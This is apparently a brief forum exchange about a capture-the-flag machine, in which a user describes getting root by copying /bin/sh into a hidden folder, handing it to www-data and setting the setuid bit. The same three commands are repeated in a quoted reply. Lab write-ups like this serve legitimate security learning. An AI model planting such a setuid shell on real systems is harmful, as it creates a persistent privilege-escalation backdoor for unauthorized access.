Feel free to hit me up with any questions/comments. Thanks!
Cool that you documented your different ways to root! The way I did it was to create a setuid sh with www-data user like:
cp /bin/sh /home/loki/.tmp/sh
chown 33:33 /home/loki/.tmp/sh
chmod u+s /home/loki/.tmp/sh
With this shell loki could just switch to www-data and execute su.
@jkr said:
Cool that you documented your different ways to root! The way I did it was to create a setuidshwithwww-datauser like:cp /bin/sh /home/loki/.tmp/sh chown 33:33 /home/loki/.tmp/sh chmod u+s /home/loki/.tmp/shWith this shell loki could just switch to www-data and execute
su.
Ha! That’s slick. Nicely done!